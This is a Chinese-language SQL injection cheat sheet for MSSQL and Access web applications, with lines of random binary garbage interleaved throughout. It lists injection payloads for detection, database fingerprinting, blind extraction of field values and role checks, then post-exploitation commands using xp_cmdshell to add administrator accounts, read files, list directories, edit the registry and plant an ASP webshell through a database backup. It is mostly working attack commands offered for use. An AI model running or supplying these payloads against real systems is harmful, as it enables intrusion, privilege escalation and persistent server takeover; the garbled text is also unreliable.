1.判断是否有注入;and 1=1 ;and 1=2 bWs�wF<y-�
2.初步判断是否是mssql ;and user>0 v"bW�Vc~H
T��`bY�idA
3.注入参数是字符'and [查询条件] and ''=' ,"%�C�.9�a
Z�,�).)y#B
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ��M��a^jy.
}T?X6LA$I8
5.判断数据库系统 �4era��5�=
�7OV�^>"�S
;and (select count(*) from sysobjects)>0 mssql YJJ�1N�/Z1
AjVC{\�Ik�
;and (select count(*) from msysobjects)>0 access "Oxr}�^% i
hLO)-u�eb�
,MY7h�8�V/
j_8� Y�Fz5
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �\<LCp;- K
w$}q�`k�'
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 N�m*��(?1
?XB�dBR_"^
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 e�Hph�M;C�
!7N:cx'�Qy
9.(1)猜字段的ascii值(access) 11H`WO�TQF
��=�L�!&Z�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 :R;w<T�bz"
CsO!�Y\'FY
(2)猜字段的ascii值(mssql) P3zUaN�\c�
RM2Ik_IH[l
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ewMVU�q*�:
F]$���� Nu
10.测试权限结构(mssql) 37U��8�<�
�]>n{~4��a
@ �st>#]i4
[?�]N
GTr#
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 7H�7
X�bi@
�6$`<���Y?
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ��[EA�Ok=X
�
0,Ds1�y^
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- b�fx�E}�>�
5nG\J�
g7
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- "�Lp�.*o�
W5R/Ub@�g
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ng1E'c�]0@
k<�9,Y�pa
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- "�-���4|HA
_H�+]G"k/r
;and 1=(select IS_MEMBER('db_owner'));-- �x@���-�K�
5a�Q)qUgAW
3l�UVD�NbZ
Vk�6��c^/v
11.添加mssql和系统的帐户 Etz#+R&�*�
V6g*�"e/8
;exec master.dbo.sp_addlogin username;-- )�PYPlSQ*V
;exec master.dbo.sp_password null,username,password;-- y,D9O�/VP�
�U�2VEFm6�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �(m/�:B=�K
J�X�59n%$@
;exec master.dbo.xp_cmdshell 'net user username password K�9<�8FSn
a5a
;Fp
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- (XZ[-��M7
GBz��?�$]6
;exec master.dbo.xp_cmdshell 'net user username password /add';-- _J,*�*AZ~z
u�o:RNokjJ
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �E?w#$H��S
���&CG�94
m�v9D{_,pD
-)�A:@+GF
12.(1)遍历目录 t^�#1=�nK
f|> �rp[Gk
;create table dirs(paths varchar(100), id int) �5�79Q&|L.
��e�,(V�y�
;insert dirs exec master.dbo.xp_dirtree 'c:\' <�����a� R
��U�ylIx�d
;and (select top 1 paths from dirs)>0 _}{KS, f]0
l6�'��K�Ig
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 1mFH�7A�($
'(]W�tx%9"
W�v�4$L�gr
(:iMs)
iO{
(2)遍历目录 \m�b4l�eg5
��c���&�c�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 8lk/*/} =<
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 re/�-Y�u$'
}9OM�XLbRv
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �Xu{y�5�N�
pSx5ume95"
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 =ejcP&-�V/
�1j2U��,_-
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
S'x� ]�c#
rJ��/H�Ida
$WYt`U;*lj
e�kx(i
QA�
13.mssql中的存储过程 MW���wqon|
X�}#vt?�mu
xp_regenumvalues 注册表根键, 子键 G4
7�^�x�R
w,1N� ;R&�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 9SC1A��-nF
d V%o�:@Z
xp_regread 根键,子键,键值名 � �(?�Ku-k
AbNr]w&pXC
;exec xp_regread -x�?Z�2EA!
$1=��7^v[U
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �JuJW]E Q�
�Uw4�iW�cC
xp_regwrite 根键,子键, 值名, 值类型, 值 )CXl�PbhY?
=eA�|g�t��
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 yzEyOz�@Q�
?y|&Mz'XJ(
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Zb�o�4{.#�
ZK4�V-?/[6
xp_regdeletevalue 根键,子键,值名 p�5]�W2i.,
;a�dZ�*'6u
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 <E�nm�H/C.
$��_J�fM^w
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �U&"L�9o`2
EWJB�/iED�
*tw�G�IX�
<MEm+8e/s6
14.mssql的backup创建webshell P$'PB*5�d|
GW
{tZ�aB
use model CC�^D4]ug�
_J���C*�4�
create table cmd(str image);
s�(���_z1
?g1eW �q&
insert into cmd(str) values (''); �t__f=QB/�
s���m##owI
backup database model to disk='c:\l.asp';
�qiOtbH�=
Y�*xgY*�K
,DE�q"VW�_
�.Bx�I~d�^
15.mssql内置函数 <.`i,|?MHS
��9@1n�:�X
;and (select @@version)>0 获得Windows的版本号 J_F\c�M� �
14&|����(M
;and user_name()='dbo' 判断当前系统的连接用户是不是sa {Gt�X�:v#�
j*>]H�No�&
;and (select user_name())>0 爆当前系统的连接用户 "OwM'�
�n8
:U\��*�4l�
;and (select db_name())>0 得到当前连接的数据库 |kmP#�`P�~
��+;+G+�Tn
D*U�xPm"pw
$.��C�\H,H
16.简洁的webshell H�@- GYX"4
@zGF9O<3,@
use model M8lw;
(
n\9IRu�YO
create table cmd(str image); �l_k:�OZ�
� XY�)X-K$
insert into cmd(str) values (''); Q�'U����!�
gZHgL���7@
backup database model to disk='g:\wwwtest\l.asp';
